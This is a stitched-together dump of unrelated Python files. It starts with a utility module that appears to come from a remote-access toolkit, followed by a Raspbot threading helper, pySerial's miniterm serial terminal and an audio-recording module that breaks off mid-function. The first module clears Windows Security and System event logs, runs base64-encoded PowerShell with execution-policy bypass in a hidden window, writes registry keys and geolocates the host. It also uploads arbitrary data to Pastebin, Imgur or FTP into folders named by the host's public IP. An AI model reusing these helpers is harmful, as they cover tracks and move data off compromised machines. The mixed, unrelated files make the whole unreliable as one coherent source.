return bool(ctypes.windll.shell32.IsUserAnAdmin() if os.name == 'nt' else os.getuid() == 0)
def geolocation():
"""
Return latitute/longitude of host machine (tuple)
"""
import sys
import json
if sys.version_info[0] > 2:
from urllib.request import urlopen
else:
from urllib2 import urlopen
response = urlopen('http://ipinfo.io').read()
json_data = json.loads(response)
latitude, longitude = json_data.get('loc').split(',')
return (latitude, longitude)
def ipv4(address):
"""
Check if valid IPv4 address
`Required`
:param str address: string to check
Returns True if input is valid IPv4 address, otherwise False
"""
import socket
try:
if socket.inet_aton(str(address)):
return True
except:
return False
def status(timestamp):
"""
Check the status of a job/thread
`Required`
:param float timestamp: Unix timestamp (seconds since the Epoch)
"""
import time
c = time.time() - float(timestamp)
data=['{} days'.format(int(c / 86400.0)) if int(c / 86400.0) else str(),
'{} hours'.format(int((c % 86400.0) / 3600.0)) if int((c % 86400.0) / 3600.0) else str(),
'{} minutes'.format(int((c % 3600.0) / 60.0)) if int((c % 3600.0) / 60.0) else str(),
'{} seconds'.format(int(c % 60.0)) if int(c % 60.0) else str()]
return ', '.join([i for i in data if i])
def unzip(filename):
"""
Extract all files from a ZIP archive
`Required`
:param str filename: path to ZIP archive
"""
import os
import zipfile
z = zipfile.ZipFile(filename)
path = os.path.dirname(filename)
z.extractall(path=path)
def post(url, headers={}, data={}, json={}, as_json=False):
"""
Make a HTTP post request and return response
`Required`
:param str url: URL of target web page
`Optional`
:param dict headers: HTTP request headers
:param dict data: HTTP request POST data
:param dict json: POST data in JSON format
:param bool as_json: return JSON formatted output
"""
try:
import requests
req = requests.post(url, headers=headers, data=data, json=json)
output = req.content
if as_json:
try:
output = req.json()
except: pass
return output
except ImportError:
import sys
if sys.version_info[0] > 2:
from urllib.request import urlopen,urlencode,Request
else:
from urllib import urlencode
from urllib2 import urlopen,Request
data = urlencode(data)
req = Request(str(url), data=data)
for key, value in headers.items():
req.headers[key] = value
output = urlopen(req).read()
if as_json:
import json
try:
output = json.loads(output)
except: pass
return output
def normalize(source):
"""
Normalize data/text/stream
`Required`
:param source: string OR readable-file
"""
import os
if os.path.isfile(source):
return open(source, 'rb').read()
elif hasattr(source, 'getvalue'):
return source.getvalue()
elif hasattr(source, 'read'):
if hasattr(source, 'seek'):
source.seek(0)
return source.read()
else:
return bytes(source)
def registry_key(key, subkey, value):
"""
Create a new Windows Registry Key in HKEY_CURRENT_USER
`Required`
:param str key: primary registry key name
:param str subkey: registry key sub-key name
:param str value: registry key sub-key value
Returns True if successful, otherwise False
"""
try:
import _winreg
reg_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, key, 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(reg_key, subkey, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(reg_key)
return True
except Exception as e:
log(e)
return False
def png(image):
"""
Transforms raw image data into a valid PNG data
`Required`
:param image: `numpy.darray` object OR `PIL.Image` object
Returns raw image data in PNG format
"""
import sys
import zlib
import numpy
import struct
try:
from StringIO import StringIO # Python 2
except ImportError:
from io import StringIO # Python 3
if isinstance(image, numpy.ndarray):
width, height = (image.shape[1], image.shape[0])
data = image.tobytes()
elif hasattr(image, 'width') and hasattr(image, 'height') and hasattr(image, 'rgb'):
width, height = (image.width, image.height)
data = image.rgb
else:
raise TypeError("invalid input type: {}".format(type(image)))
line = width * 3
png_filter = struct.pack('>B', 0)
scanlines = b"".join([png_filter + data[y * line:y * line + line] for y in range(height)])
magic = struct.pack('>8B', 137, 80, 78, 71, 13, 10, 26, 10)
ihdr = [b"", b'IHDR', b"", b""]
ihdr[2] = struct.pack('>2I5B', width, height, 8, 2, 0, 0, 0)
ihdr[3] = struct.pack('>I', zlib.crc32(b"".join(ihdr[1:3])) & 0xffffffff)
ihdr[0] = struct.pack('>I', len(ihdr[2]))
idat = [b"", b'IDAT', zlib.compress(scanlines), b""]
idat[3] = struct.pack('>I', zlib.crc32(b"".join(idat[1:3])) & 0xffffffff)
idat[0] = struct.pack('>I', len(idat[2]))
iend = [b"", b'IEND', b"", b""]
iend[3] = struct.pack('>I', zlib.crc32(iend[1]) & 0xffffffff)
iend[0] = struct.pack('>I', len(iend[2]))
fileh = StringIO()
fileh.write(str(magic))
fileh.write(str(b"".join(ihdr)))
fileh.write(str(b"".join(idat)))
fileh.write(str(b"".join(iend)))
fileh.seek(0)
output = fileh.getvalue()
if sys.version_info[0] > 2:
output = output.encode('utf-8') # python3 compatibility
return output
def delete(target):
"""
Tries to delete file via multiple methods, if necessary
`Required`
:param str target: target filename to delete
"""
import os
import shutil
try:
_ = os.popen('attrib -h -r -s {}'.format(target)) if os.name == 'nt' else os.chmod(target, 777)
except OSError: pass
try:
if os.path.isfile(target):
os.remove(target)
elif os.path.isdir(target):
import shutil
shutil.rmtree(target, ignore_errors=True)
except OSError: pass
def clear_system_logs():
"""
Clear Windows system logs (Application, security, Setup, System)
"""
try:
for log in ["application","security","setup","system"]:
output = powershell("& { [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog(\"%s\")}" % log)
if output:
log(output)
except Exception as e:
log(e)
def kwargs(data):
"""
Takes a string as input and returns a dictionary of keyword arguments
`Required`
:param str data: string to parse for keyword arguments
Returns dictionary of keyword arguments as key-value pairs
"""
try:
return {i.partition('=')[0]: i.partition('=')[2] for i in str(data).split() if '=' in i}
except Exception as e:
log(e)
def powershell(code):
"""
Execute code in Powershell.exe and return any results
`Required`
:param str code: script block of Powershell code
Returns any output from Powershell executing the code
"""
import os
import base64
try:
powershell = r'C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe' if os.path.exists(r'C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe') else os.popen('where powershell').read().rstrip()
return os.popen('{} -exec bypass -window hidden -noni -nop -encoded {}'.format(powershell, base64.b64encode(code))).read()
except Exception as e:
log("{} error: {}".format(powershell.__name__, str(e)))
def display(output, color=None, style=None, end='\\n', event=None, lock=None):
"""
Display output in the console
`Required`
:param str output: text to display
`Optional`
:param str color: red, green, cyan, magenta, blue, white
:param str style: normal, bright, dim
:param str end: __future__.print_function keyword arg
:param lock: threading.Lock object
:param event: threading.Event object
"""
if isinstance(output, bytes):
output = output.decode('utf-8')
else:
output = str(output)
_color = ''
if color:
_color = getattr(colorama.Fore, color.upper())
_style = ''
if style:
_style = getattr(colorama.Style, style.upper())
exec("""print(_color + _style + output + colorama.Style.RESET_ALL, end="{}")""".format(end))
def color():
"""
Returns a random color for use in console display
"""
try:
import random
return random.choice(['BLACK', 'BLUE', 'CYAN', 'GREEN', 'LIGHTBLACK_EX', 'LIGHTBLUE_EX', 'LIGHTCYAN_EX', 'LIGHTGREEN_EX', 'LIGHTMAGENTA_EX', 'LIGHTRED_EX', 'LIGHTWHITE_EX', 'LIGHTYELLOW_EX', 'MAGENTA', 'RED', 'RESET', 'WHITE', 'YELLOW'])
except Exception as e:
log("{} error: {}".format(color.__name__, str(e)))
def imgur(source, api_key=None):
"""
Upload image file/data to Imgur
"""
import base64
if api_key:
response = post('https://api.imgur.com/3/upload', headers={'Authorization': 'Client-ID {}'.format(api_key)}, data={'image': base64.b64encode(normalize(source)), 'type': 'base64'}, as_json=True)
return response['data']['link'].encode()
else:
log("No Imgur API key found")
def pastebin(source, api_key):
"""
Upload file/data to Pastebin
`Required`
:param str source: data or readable file-like object
:param str api_dev_key: Pastebin api_dev_key
`Optional`
:param str api_user_key: Pastebin api_user_key
"""
import sys
if sys.version_info[0] > 2:
from urllib.parse import urlsplit,urlunsplit
else:
from urllib2 import urlparse
urlsplit = urlparse.urlsplit
urlunsplit = urlparse.urlunsplit
if isinstance(api_key, str):
try:
info = {'api_option': 'paste', 'api_paste_code': normalize(source), 'api_dev_key': api_key}
paste = post('https://pastebin.com/api/api_post.php', data=info)
parts = urlsplit(paste)
result = urlunsplit((parts.scheme, parts.netloc, '/raw' + parts.path, parts.query, parts.fragment)) if paste.startswith('http') else paste
if not result.endswith('/'):
result += '/'
return result
except Exception as e:
log("Upload to Pastebin failed with error: {}".format(e))
else:
log("No Pastebin API key found")
def ftp(source, host=None, user=None, password=None, filetype=None):
"""
Upload file/data to FTP server
`Required`
:param str source: data or readable file-like object
:param str host: FTP server hostname
:param str user: FTP account username
:param str password: FTP account password
`Optional`
:param str filetype: target file type (default: .txt)
"""
import os
import time
import ftplib
try:
from StringIO import StringIO # Python 2
except ImportError:
from io import StringIO # Python 3
if host and user and password:
path = ''
local = time.ctime().split()
if os.path.isfile(str(source)):
path = source
source = open(path, 'rb')
elif hasattr(source, 'seek'):
source.seek(0)
else:
source = StringIO(source)
try:
ftp = ftplib.FTP(host=host, user=user, password=password)
except:
return "Upload failed - remote FTP server authorization error"
addr = public_ip()
if 'tmp' not in ftp.nlst():
ftp.mkd('/tmp')
if addr not in ftp.nlst('/tmp'):
ftp.mkd('/tmp/{}'.format(addr))
if path:
path = '/tmp/{}/{}'.format(addr, os.path.basename(path))
else:
filetype = '.' + str(filetype) if not str(filetype).startswith('.') else str(filetype)
path = '/tmp/{}/{}'.format(addr, '{}-{}_{}{}'.format(local[1], local[2], local[3], filetype))
stor = ftp.storbinary('STOR ' + path, source)
return path
else:
log('missing one or more required arguments: host, user, password')
def config(*arg, **options):
"""
Configuration decorator for adding attributes (e.g. declare platforms attribute with list of compatible platforms)
"""
import functools
def _config(function):
@functools.wraps(function)
def wrapper(*args, **kwargs):
return function(*args, **kwargs)
for k,v in options.items():
setattr(wrapper, k, v)
return wrapper
return _config
def threaded(function):
"""
Decorator for making a function threaded
`Required`
:param function: function/method to run in a thread
"""
import time
import threading
import functools
@functools.wraps(function)
def _threaded(*args, **kwargs):
t = threading.Thread(target=function, args=args, kwargs=kwargs, name=time.time())
t.daemon = True
t.start()
return t
return _threaded
|
process.py | """
Raspbot Remote Control Application (Raspbot RCA, Raspbot RCA-G), v1.2
basics module, contains basic application functions such as exiting client software, multithreading, and editing configs.
Made by perpetualCreations
Handles multithreading.
"""
from basics import objects
from typing import Union
def create_process(target: Union[classmethod, staticmethod, object], args: tuple = ()) -> Union[None, object]:
"""
Creates a new thread from multithreading.
@param target: the function being processed.
@param args: the arguments for said function being processed.
@return: if failed, returns nothing. otherwise returns dummy variable.
"""
if __name__ == "basics.process":
try:
dummy = objects.threading.Thread(target = target, args = args, daemon = True)
dummy.start()
except objects.threading.ThreadError as ThreadErrorMessage:
print("[FAIL]: Process creation failed! Details below.")
print(ThreadErrorMessage)
return None
pass
return dummy
else: pass
pass
def stop_process(target: object) -> True:
"""
Returns True for termination flag for a thread, joins given target.
Use as thread_flag = stop_process(thread_object).
@param target: process to be stopped.
@return: bool, True
"""
target.join()
return True
pass
|
miniterm.py | #!/usr/bin/python
# Very simple serial terminal
# (C)2002-2009 Chris Liechti <cliechti@gmx.net>
# Input characters are sent directly (only LF -> CR/LF/CRLF translation is
# done), received characters are displayed as is (or escaped trough pythons
# repr, useful for debug purposes)
import sys, os, serial, threading
EXITCHARCTER = '\x1d' # GS/CTRL+]
MENUCHARACTER = '\x14' # Menu: CTRL+T
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+%c' % (ord('@') + ascii_code)
else:
return repr(character)
# help text, starts with blank line! it's a function so that the current values
# for the shortcut keys is used and not the value at program start
def get_help_text():
return """
--- pySerial (%(version)s) - miniterm - help
---
--- %(exit)-8s Exit program
--- %(menu)-8s Menu escape key, followed by:
--- Menu keys:
--- %(itself)-8s Send the menu character itself to remote
--- %(exchar)-8s Send the exit character to remote
--- %(info)-8s Show info
--- %(upload)-8s Upload file (prompt will be shown)
--- Toggles:
--- %(rts)s RTS %(echo)s local echo
--- %(dtr)s DTR %(break)s BREAK
--- %(lfm)s line feed %(repr)s Cycle repr mode
---
--- Port settings (%(menu)s followed by the following):
--- 7 8 set data bits
--- n e o s m change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""" % {
'version': getattr(serial, 'VERSION', 'unkown'),
'exit': key_description(EXITCHARCTER),
'menu': key_description(MENUCHARACTER),
'rts': key_description('\x12'),
'repr': key_description('\x01'),
'dtr': key_description('\x04'),
'lfm': key_description('\x0c'),
'break': key_description('\x02'),
'echo': key_description('\x05'),
'info': key_description('\x09'),
'upload': key_description('\x15'),
'itself': key_description(MENUCHARACTER),
'exchar': key_description(EXITCHARCTER),
}
# first choose a platform dependant way to read single characters from the console
global console
if os.name == 'nt':
import msvcrt
class Console:
def __init__(self):
pass
def setup(self):
pass # Do nothing for 'nt'
def cleanup(self):
pass # Do nothing for 'nt'
def getkey(self):
while 1:
z = msvcrt.getch()
if z == '\0' or z == '\xe0': # functions keys
msvcrt.getch()
else:
if z == '\r':
return '\n'
return z
console = Console()
elif os.name == 'posix':
import termios, sys, os
class Console:
def __init__(self):
self.fd = sys.stdin.fileno()
def setup(self):
self.old = termios.tcgetattr(self.fd)
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = os.read(self.fd, 1)
return c
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
console = Console()
def cleanup_console():
console.cleanup()
console.setup()
sys.exitfunc = cleanup_console #terminal modes have to be restored on exit...
else:
raise "Sorry no implementation for your platform (%s) available." % sys.platform
CONVERT_CRLF = 2
CONVERT_CR = 1
CONVERT_LF = 0
NEWLINE_CONVERISON_MAP = ('\n', '\r', '\r\n')
LF_MODES = ('LF', 'CR', 'CR/LF')
REPR_MODES = ('raw', 'some control', 'all control', 'hex')
class Miniterm:
def __init__(self, port, baudrate, parity, rtscts, xonxoff, echo=False, convert_outgoing=CONVERT_CRLF, repr_mode=0):
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
self.echo = echo
self.repr_mode = repr_mode
self.convert_outgoing = convert_outgoing
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
self.dtr_state = True
self.rts_state = True
self.break_state = False
def start(self):
self.alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.setDaemon(1)
self.receiver_thread.start()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer)
self.transmitter_thread.setDaemon(1)
self.transmitter_thread.start()
def stop(self):
self.alive = False
def join(self, transmit_only=False):
self.transmitter_thread.join()
if not transmit_only:
self.receiver_thread.join()
def dump_port_settings(self):
sys.stderr.write("\n--- Settings: %s %s,%s,%s,%s\n" % (
self.serial.portstr,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits,
))
sys.stderr.write('--- RTS %s\n' % (self.rts_state and 'active' or 'inactive'))
sys.stderr.write('--- DTR %s\n' % (self.dtr_state and 'active' or 'inactive'))
sys.stderr.write('--- BREAK %s\n' % (self.break_state and 'active' or 'inactive'))
sys.stderr.write('--- software flow control %s\n' % (self.serial.xonxoff and 'active' or 'inactive'))
sys.stderr.write('--- hardware flow control %s\n' % (self.serial.rtscts and 'active' or 'inactive'))
sys.stderr.write('--- data escaping: %s\n' % (REPR_MODES[self.repr_mode],))
sys.stderr.write('--- linefeed: %s\n' % (LF_MODES[self.convert_outgoing],))
try:
sys.stderr.write('--- CTS: %s DSR: %s RI: %s CD: %s\n' % (
(self.serial.getCTS() and 'active' or 'inactive'),
(self.serial.getDSR() and 'active' or 'inactive'),
(self.serial.getRI() and 'active' or 'inactive'),
(self.serial.getCD() and 'active' or 'inactive'),
))
except serial.SerialException:
# on RFC 2217 ports it can happen to no modem state notification was
# yet received. ignore this error.
pass
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive:
data = self.serial.read(1)
if self.repr_mode == 0:
# direct output, just have to care about newline setting
if data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(data)
elif self.repr_mode == 1:
# escape non-printable, let pass newlines
if self.convert_outgoing == CONVERT_CRLF and data in '\r\n':
if data == '\n':
sys.stdout.write('\n')
elif data == '\r':
pass
elif data == '\n' and self.convert_outgoing == CONVERT_LF:
sys.stdout.write('\n')
elif data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 2:
# escape all non-printable, including newline
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 3:
# escape everything (hexdump)
for character in data:
sys.stdout.write("%s " % character.encode('hex'))
sys.stdout.flush()
except serial.SerialException, e:
self.alive = False
# would be nice if the console reader could be interruptted at this
# point...
raise
def writer(self):
"""loop and copy console->serial until EXITCHARCTER character is
found. when MENUCHARACTER is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = console.getkey()
except KeyboardInterrupt:
c = '\x03'
if menu_active:
if c == MENUCHARACTER or c == EXITCHARCTER: # Menu character again/exit char -> send itself
self.serial.write(c) # send character
if self.echo:
sys.stdout.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
console.cleanup()
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
file = open(filename, 'r')
sys.stderr.write('--- Sending file %s ---\n' % filename)
while True:
line = file.readline().rstrip('\r\n')
if not line:
break
self.serial.write(line)
self.serial.write('\r\n')
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File %s sent ---\n' % filename)
except IOError, e:
sys.stderr.write('--- ERROR opening file %s: %s ---\n' % (filename, e))
console.setup()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.rts_state = not self.rts_state
self.serial.setRTS(self.rts_state)
sys.stderr.write('--- RTS %s ---\n' % (self.rts_state and 'active' or 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.dtr_state = not self.dtr_state
self.serial.setDTR(self.dtr_state)
sys.stderr.write('--- DTR %s ---\n' % (self.dtr_state and 'active' or 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.break_state = not self.break_state
self.serial.setBreak(self.break_state)
sys.stderr.write('--- BREAK %s ---\n' % (self.break_state and 'active' or 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo %s ---\n' % (self.echo and 'active' or 'inactive'))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
elif c == '\x01': # CTRL+A -> cycle escape mode
self.repr_mode += 1
if self.repr_mode > 3:
self.repr_mode = 0
sys.stderr.write('--- escape data: %s ---\n' % (
REPR_MODES[self.repr_mode],
))
elif c == '\x0c': # CTRL+L -> cycle linefeed mode
self.convert_outgoing += 1
if self.convert_outgoing > 2:
self.convert_outgoing = 0
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
sys.stderr.write('--- line feed %s ---\n' % (
LF_MODES[self.convert_outgoing],
))
#~ elif c in 'pP': # P -> change port XXX reader thread would exit
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
console.cleanup()
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError, e:
sys.stderr.write('--- ERROR setting baudrate: %s ---\n' % (e,))
self.serial.baudrate = backup
else:
self.dump_port_settings()
console.setup()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character %s --\n' % key_description(c))
menu_active = False
elif c == MENUCHARACTER: # next char will be for menu
menu_active = True
elif c == EXITCHARCTER:
self.stop()
break # exit app
elif c == '\n':
self.serial.write(self.newline) # send newline character(s)
if self.echo:
sys.stdout.write(c) # local echo is a real newline in any case
sys.stdout.flush()
else:
self.serial.write(c) # send character
if self.echo:
sys.stdout.write(c)
sys.stdout.flush()
except:
self.alive = False
raise
def main():
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Miniterm - A simple terminal program for the serial port."
)
parser.add_option("-p", "--port",
dest = "port",
help = "port, a number (default 0) or a device name (deprecated option)",
default = None
)
parser.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default %default",
default = 9600
)
parser.add_option("--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O, S, M], default=N",
default = 'N'
)
parser.add_option("-e", "--echo",
dest = "echo",
action = "store_true",
help = "enable local echo (default off)",
default = False
)
parser.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
parser.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
parser.add_option("--cr",
dest = "cr",
action = "store_true",
help = "do not send CR+LF, send CR only",
default = False
)
parser.add_option("--lf",
dest = "lf",
action = "store_true",
help = "do not send CR+LF, send LF only",
default = False
)
parser.add_option("-D", "--debug",
dest = "repr_mode",
action = "count",
help = """debug received data (escape non-printable chars)
--debug can be given multiple times:
0: just print what is received
1: escape non-printable characters, do newlines as unusual
2: escape non-printable characters, newlines too
3: hex dump everything""",
default = 0
)
parser.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = None
)
parser.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = None
)
parser.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non error messages",
default = False
)
parser.add_option("--exit-char",
dest = "exit_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to exit the application",
default = 0x1d
)
parser.add_option("--menu-char",
dest = "menu_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to control miniterm (menu)",
default = 0x14
)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
if options.cr and options.lf:
parser.error("only one of --cr or --lf can be specified")
if options.menu_char == options.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
global EXITCHARCTER, MENUCHARACTER
EXITCHARCTER = chr(options.exit_char)
MENUCHARACTER = chr(options.menu_char)
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
if port is None: port = 0
convert_outgoing = CONVERT_CRLF
if options.cr:
convert_outgoing = CONVERT_CR
elif options.lf:
convert_outgoing = CONVERT_LF
try:
miniterm = Miniterm(
port,
baudrate,
options.parity,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
echo=options.echo,
convert_outgoing=convert_outgoing,
repr_mode=options.repr_mode,
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
if not options.quiet:
sys.stderr.write('--- Miniterm on %s: %d,%s,%s,%s ---\n' % (
miniterm.serial.portstr,
miniterm.serial.baudrate,
miniterm.serial.bytesize,
miniterm.serial.parity,
miniterm.serial.stopbits,
))
sys.stderr.write('--- Quit: %s | Menu: %s | Help: %s followed by %s ---\n' % (
key_description(EXITCHARCTER),
key_description(MENUCHARACTER),
key_description(MENUCHARACTER),
key_description('\x08'),
))
if options.dtr_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing DTR %s\n' % (options.dtr_state and 'active' or 'inactive'))
miniterm.serial.setDTR(options.dtr_state)
miniterm.dtr_state = options.dtr_state
if options.rts_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing RTS %s\n' % (options.rts_state and 'active' or 'inactive'))
miniterm.serial.setRTS(options.rts_state)
miniterm.rts_state = options.rts_state
miniterm.start()
miniterm.join(True)
if not options.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
if __name__ == '__main__':
main()
|
audio_module.py | from engine import TextWriter
from engine import SystemState
from engine import Utilities
from engine import Menu
from engine import Events
import pyaudio
import wave
import time
import os
import Queue
import numpy
import fnmatch
import signal
import threading
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
signal.signal(signal.SIGINT, Utilities.GracefulExit)
class AudioState(object):
pass
def Init():
SystemState.AudioState = AudioState
SystemState.AudioState.pyaudio = pyaudio.PyAudio()
SystemState.AudioState.audio_name = None
SystemState.AudioState.audio_file = None
SystemState.AudioState.audio_time = 0
SystemState.AudioState.audio_path = 'media/audio/'
SystemState.AudioState.metadata_path = SystemState.AudioState.audio_path + '.metadata/'
SystemState.AudioState.recording_audio = False
SystemState.AudioState.current_audio_file = None
SystemState.AudioState.audio_message_queue = Queue.Queue()
SystemState.AudioState.audio_player_state = None
MakeAudioPath()
def Process():
button = str(SystemState.pressed_button)
pygame = SystemState.pygame
screen = SystemState.screen
screen_mode = SystemState.screen_mode
if button == 'record':
if SystemState.AudioState.recording_audio == True:
SystemState.AudioState.recording_audio = False
StopRecordingAudio()
else:
TextWriter.Write(
text='Rec',
position=(10, 10),
color=(255,0,0),
state=SystemState,
size=20
)
SystemState.AudioState.recording_audio = True
CallRecordAudio()
elif button == 'play':
Menu.JumpTo(screen_mode=3, toggle=True)
Play()
elif button == 'pause':
Menu.JumpTo(screen_mode=2, toggle=True)
Pause()
elif button == 'library':
SystemState.AudioState.recording_audio = False
Menu.JumpTo(screen_mode=2)
StopRecordingAudio()
OpenLibrary()
Pause()
elif button == 'go_back':
SystemState.AudioState.recording_audio = False
Menu.Back()
elif button == 'rewind':
Rewind()
elif button == 'fast_forward':
FastForward()
elif button == 'next':
if SystemState.AudioState.audio_count > 0:
NextRecording()
elif button == 'previous':
if SystemState.AudioState.audio_count > 0:
PreviousRecording()
elif button == 'delete':
if SystemState.AudioState.audio_count > 0:
Menu.JumpTo(screen_mode=2)
TextWriter.Write(
state=SystemState,
text='Delete?',
position=(125, 75),
size=20
)
elif button == 'accept':
DeleteAudio()
OpenLibrary()
Menu.Back()
elif button == 'decline':
OpenLibrary()
Menu.Back()
def MakeAudioPath():
"""Makes audio path for sound recordings."""
if os.path.exists(SystemState.AudioState.metadata_path) == False:
os.makedirs(SystemState.AudioState.metadata_path)
os.chown(SystemState.AudioState.metadata_path, SystemState.uid, SystemState.gid)
def CallRecordAudio():
"""Creates thread to record audio"""
args = ()
thread = threading.Thread(target=RecordAudio)
thread.setDaemon(True)
thread.start()
def RecordAudio():
"""Records single channel wave file"""
CHUNK = 8192
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = int(SystemState.AudioState.pyaudio.get_device_info_by_index(0)['defaultSampleRate'])
TIMESTAMP = str(int(time.time()))
FILENAME = SystemState.AudioState.audio_path + TIMESTAMP + '.wav'
RECORD_SECONDS = 10800
frames = []
audio_message_queue = None
SystemState.AudioState.audio_message_queue.put({'recording': True})
with SystemState.AudioState.audio_message_queue.mutex:
SystemState.AudioState.audio_message_queue.queue.clear()
# Setting up stream.
stream = SystemState.AudioState.pyaudio.open(
format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
output=True,
frames_per_buffer=CHUNK
)
# Recording data to a wave file.
for i in range(0, int(RATE/CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
try:
audio_message_queue = SystemState.AudioState.audio_message_queue.get(False)
except Queue.Empty:
audio_message_queue = None
if audio_message_queue != None:
if audio_message_queue.get('recording') == False:
break
# Stopping and closing stream.
stream.stop_stream()
stream.close()
# Converting stream data into a wave file.
wavefile = wave.open(FILENAME, 'wb')
wavefile.setnchannels(CHANNELS)
wavefile.setsampwidth(SystemState.AudioState.pyaudio.get_sample_size(FORMAT))
wavefile.setframerate(RATE)
wavefile.writeframes(b''.join(frames))
wavefile.close()
# Opening wave file to read and generate spectrogram.
wavefile = wave.open(FILENAME, 'rb')
_GenerateSpectrogram(wavefile, TIMESTAMP)
wavefile.close()
def StopRecordingAudio():
"""Stops recording audio file."""
SystemState.AudioState.recording_audio = False
audio_action = {'recording': False}
SystemState.AudioState.audio_message_queue.put(audio_action)
def OpenLibrary():
"""Open's the recording library for exploration on screen."""
path = SystemState.AudioState.audio_path
